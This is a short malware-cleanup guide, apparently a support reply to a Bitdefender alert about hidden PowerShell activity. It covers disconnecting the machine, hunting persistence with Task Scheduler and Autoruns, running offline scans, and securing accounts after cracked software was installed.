The engine saw actions linked with malware. Example actions include:
• Hidden PowerShell execution
• Contact with unknown external IP
• Attempted script download or execution
Bitdefender blocked the connection. The program which triggered the action likely still exists on the system.
Steps to take now
Disconnect the computer
Turn off WiFi or unplug Ethernet.
This blocks communication with the attacker server and blocks additional downloads.
Find what triggers the PowerShell command
Malware often installs persistence. It runs again after restart.
Check Task Scheduler
• Press Win + R
• Type taskschd.msc
• Open Task Scheduler Library
• Look for unusual task names
• Check tasks launching powershell.exe with long arguments or encoded commands
If a suspicious task appears:
• Right click
• Disable it first
• Do not delete yet
Use Autoruns from Microsoft Sysinternals
Autoruns lists every startup item. Malware often hides in startup entries.
Steps:
• Download Autoruns
• Run as Administrator
• Check tabs such as Logon, Scheduled Tasks, Services, and WMI
• Look for unknown entries pointing to temp folders, AppData, or random file names
Disable suspicious entries.
Run deeper scans
Use more than one scanner.
Run Microsoft Defender Offline Scan
Steps:
• Open Windows Security
• Virus and Threat Protection
• Scan Options
• Select Microsoft Defender Offline Scan
The system restarts and scans before Windows loads. This catches stubborn malware.
Run Malwarebytes full scan
The free version works well for cleaning leftovers from cracked software infections.
Important warning about cracked software
Cracked installers often hide malware. Many contain droppers or backdoors.
Common risks include:
• credential theft
• remote system control
• crypto wallet theft
• keylogging
If cracked software ran on the system, assume account exposure.
Actions to take after cleaning:
• change passwords from a clean device
• enable two factor authentication on email, exchanges, and wallets
• review login history on major accounts
Next step
If Bitdefender alerts continue every few minutes, persistence still exists. Something keeps launching the PowerShell command.
Working through the Autoruns entries helps identify the exact file responsible.
